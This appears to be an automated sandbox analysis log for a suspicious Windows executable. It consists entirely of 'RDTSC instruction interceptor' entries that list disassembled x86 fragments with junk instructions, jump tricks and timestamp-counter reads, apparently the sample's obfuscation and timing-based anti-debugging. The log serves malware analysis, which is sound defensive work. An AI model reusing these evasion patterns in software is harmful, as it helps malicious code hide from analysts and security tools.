Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 368F16 second address: 368F7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F4AE0E87EBCh 0x0000000c popad 0x0000000d push eax 0x0000000e push eax 0x0000000f jc 00007F4AE0E87EBCh 0x00000015 pop eax 0x00000016 nop 0x00000017 add cl, 00000072h 0x0000001a lea eax, dword ptr [ebp+1248CA90h] 0x00000020 push 00000000h 0x00000022 push ebp 0x00000023 call 00007F4AE0E87EB8h 0x00000028 pop ebp 0x00000029 mov dword ptr [esp+04h], ebp 0x0000002d add dword ptr [esp+04h], 0000001Bh 0x00000035 inc ebp 0x00000036 push ebp 0x00000037 ret 0x00000038 pop ebp 0x00000039 ret 0x0000003a mov cl, DFh 0x0000003c nop 0x0000003d jns 00007F4AE0E87EBEh 0x00000043 push eax 0x00000044 push eax 0x00000045 push edx 0x00000046 push edi 0x00000047 push eax 0x00000048 push edx 0x00000049 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 368F7C second address: 368F81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 368F81 second address: 368F87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 368F87 second address: 34E9EF instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 add cx, BC4Fh 0x0000000e call dword ptr [ebp+12460CE3h] 0x00000014 jg 00007F4AE04F88A5h 0x0000001a jmp 00007F4AE04F888Fh 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 34E9EF second address: 34E9F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 34E9F3 second address: 34EA20 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 pushad 0x00000009 popad 0x0000000a push esi 0x0000000b pop esi 0x0000000c pop eax 0x0000000d js 00007F4AE04F888Eh 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F4AE04F8890h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 34EA20 second address: 34EA24 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 39E086 second address: 39E08C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 39E08C second address: 39E092 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 39E4B0 second address: 39E4CC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4AE04F8895h 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 39E4CC second address: 39E502 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F4AE0E87EB6h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d jnp 00007F4AE0E87EDFh 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 push edx 0x00000017 pop edx 0x00000018 jmp 00007F4AE0E87EC9h 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 34EA0A second address: 34EA20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F4AE04F8890h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 3A6DC6 second address: 3A6DE1 instructions: 0x00000000 rdtsc 0x00000002 js 00007F4AE0E87EB6h 0x00000008 jmp 00007F4AE0E87EC1h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 3A732D second address: 3A7356 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4AE04F8899h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jo 00007F4AE04F888Eh 0x00000011 push eax 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 3A7356 second address: 3A735A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 3A772B second address: 3A7730 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 3A79D1 second address: 3A79DB instructions: 0x00000000 rdtsc 0x00000002 jo 00007F4AE0E87EB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 3A79DB second address: 3A79E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 3A79E1 second address: 3A79E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 3A79E5 second address: 3A7A34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F4AE04F8886h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F4AE04F8895h 0x00000011 pop edx 0x00000012 pop eax 0x00000013 pushad 0x00000014 jmp 00007F4AE04F888Fh 0x00000019 push eax 0x0000001a push edx 0x0000001b jnc 00007F4AE04F8886h 0x00000021 jmp 00007F4AE04F8894h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 3A7A34 second address: 3A7A38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 3A7A38 second address: 3A7A58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F4AE04F8896h 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 3A9622 second address: 3A965C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 pop eax 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 pop ecx 0x00000008 pushad 0x00000009 jmp 00007F4AE0E87EBAh 0x0000000e jmp 00007F4AE0E87EC0h 0x00000013 push esi 0x00000014 pop esi 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a jl 00007F4AE0E87ECAh 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 popad 0x00000024 jnp 00007F4AE0E87EB6h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 3A965C second address: 3A9660 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 3B234C second address: 3B2350 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 3B1273 second address: 3B1284 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4AE04F888Ch 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 3B1284 second address: 3B12AA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jbe 00007F4AE0E87EB6h 0x00000009 pop esi 0x0000000a pushad 0x0000000b jmp 00007F4AE0E87EC3h 0x00000010 jp 00007F4AE0E87EB6h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 3B13C5 second address: 3B13D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push esi 0x00000008 jns 00007F4AE04F8886h 0x0000000e pop esi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 3B13D4 second address: 3B13DF instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jo 00007F4AE0E87EB6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 3B13DF second address: 3B13E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push esi 0x00000007 pop esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 3B16FF second address: 3B1705 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 3B1705 second address: 3B170E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 3B19CF second address: 3B19E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4AE0E87EC6h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 3B19E9 second address: 3B19EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 3B19EF second address: 3B19F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 3B19F5 second address: 3B19F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 3B19F9 second address: 3B1A20 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4AE0E87EC5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jne 00007F4AE0E87EBAh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 3B1A20 second address: 3B1A2C instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F4AE04F888Eh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 3B1A2C second address: 3B1A35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 3B21AC second address: 3B21CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F4AE04F8886h 0x0000000a popad 0x0000000b pushad 0x0000000c jmp 00007F4AE04F8892h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 331D9F second address: 331DA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 3B7472 second address: 3B7476 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 3B7476 second address: 3B7492 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F4AE0E87EC6h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 3B7638 second address: 3B7646 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4AE04F888Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 3B7646 second address: 3B7650 instructions: 0x00000000 rdtsc 0x00000002 je 00007F4AE0E87EB6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 3BCF31 second address: 3BCF4F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F4AE04F8895h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 3BD097 second address: 3BD09E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop eax 0x00000007 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 3BD09E second address: 3BD0AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 jnp 00007F4AE04F8886h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 3BD0AA second address: 3BD0AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 3BD20B second address: 3BD21E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F4AE04F888Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 368925 second address: 368929 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 368929 second address: 368933 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F4AE04F8886h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 368933 second address: 36893D instructions: 0x00000000 rdtsc 0x00000002 jc 00007F4AE0E87EBCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 36893D second address: 368962 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jns 00007F4AE04F88A4h 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F4AE04F8896h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 368962 second address: 3689A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 mov edi, eax 0x00000009 mov ebx, dword ptr [ebp+1248CACFh] 0x0000000f xor di, B675h 0x00000014 add eax, ebx 0x00000016 push 00000000h 0x00000018 push edx 0x00000019 call 00007F4AE0E87EB8h 0x0000001e pop edx 0x0000001f mov dword ptr [esp+04h], edx 0x00000023 add dword ptr [esp+04h], 00000015h 0x0000002b inc edx 0x0000002c push edx 0x0000002d ret 0x0000002e pop edx 0x0000002f ret 0x00000030 xor edi, 6326A9A2h 0x00000036 nop 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b jns 00007F4AE0E87EB6h 0x00000041 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 3689A6 second address: 3689BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4AE04F8894h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 3689BE second address: 3689C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F4AE0E87EB6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 3689C8 second address: 3689DA instructions: 0x00000000 rdtsc 0x00000002 jl 00007F4AE04F8886h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 pop esi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 3689DA second address: 368A27 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4AE0E87EBBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push esi 0x0000000e call 00007F4AE0E87EB8h 0x00000013 pop esi 0x00000014 mov dword ptr [esp+04h], esi 0x00000018 add dword ptr [esp+04h], 0000001Dh 0x00000020 inc esi 0x00000021 push esi 0x00000022 ret 0x00000023 pop esi 0x00000024 ret 0x00000025 mov ch, A1h 0x00000027 push 00000004h 0x00000029 mov di, 3FBBh 0x0000002d nop 0x0000002e push ebx 0x0000002f pushad 0x00000030 push eax 0x00000031 pop eax 0x00000032 push edi 0x00000033 pop edi 0x00000034 popad 0x00000035 pop ebx 0x00000036 push eax 0x00000037 pushad 0x00000038 push eax 0x00000039 push edx 0x0000003a pushad 0x0000003b popad 0x0000003c rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 3BD3C3 second address: 3BD3F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4AE04F8895h 0x00000009 je 00007F4AE04F8886h 0x0000000f popad 0x00000010 jno 00007F4AE04F8888h 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a push edi 0x0000001b pop edi 0x0000001c rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 3BF9B2 second address: 3BF9DC instructions: 0x00000000 rdtsc 0x00000002 js 00007F4AE0E87EB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F4AE0E87EC8h 0x0000000f push eax 0x00000010 push edx 0x00000011 jbe 00007F4AE0E87EB6h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 3BF9DC second address: 3BF9E2 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 3C33EC second address: 3C33F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 3C33F2 second address: 3C33FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pop ebx 0x00000008 pushad 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 3C33FE second address: 3C3406 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 3C6F40 second address: 3C6F46 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 3C71B2 second address: 3C71B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 3C71B6 second address: 3C71CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F4AE04F8886h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c je 00007F4AE04F888Eh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 3C71CA second address: 3C71D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 3C74B8 second address: 3C74BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 3C74BC second address: 3C74C4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 3C74C4 second address: 3C74C9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 3CFB41 second address: 3CFB73 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4AE0E87EC8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F4AE0E87EC0h 0x0000000f pushad 0x00000010 push edx 0x00000011 pop edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 3CFB73 second address: 3CFB79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 3CDB9B second address: 3CDBB5 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F4AE0E87EC2h 0x00000008 jbe 00007F4AE0E87EB6h 0x0000000e jg 00007F4AE0E87EB6h 0x00000014 push eax 0x00000015 push edx 0x00000016 push edx 0x00000017 pop edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 3CE14C second address: 3CE150 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 3CE150 second address: 3CE15C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 3CE15C second address: 3CE160 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 3CE3CF second address: 3CE3DC instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F4AE0E87EB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 3CE3DC second address: 3CE3E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 3CECBC second address: 3CECC1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 3CF2C0 second address: 3CF2CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jng 00007F4AE04F8892h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 3CF2CD second address: 3CF2D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 3CF594 second address: 3CF611 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jnl 00007F4AE04F88B4h 0x0000000b jmp 00007F4AE04F888Eh 0x00000010 pushad 0x00000011 push esi 0x00000012 pop esi 0x00000013 jg 00007F4AE04F8886h 0x00000019 push edx 0x0000001a pop edx 0x0000001b popad 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f jnl 00007F4AE04F889Dh 0x00000025 push esi 0x00000026 push edx 0x00000027 pop edx 0x00000028 jng 00007F4AE04F8886h 0x0000002e pop esi 0x0000002f rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 3CF8BA second address: 3CF8BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 3CF8BE second address: 3CF8DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007F4AE04F888Eh 0x0000000c push edx 0x0000000d pop edx 0x0000000e ja 00007F4AE04F8886h 0x00000014 push eax 0x00000015 pushad 0x00000016 popad 0x00000017 pushad 0x00000018 popad 0x00000019 pop eax 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
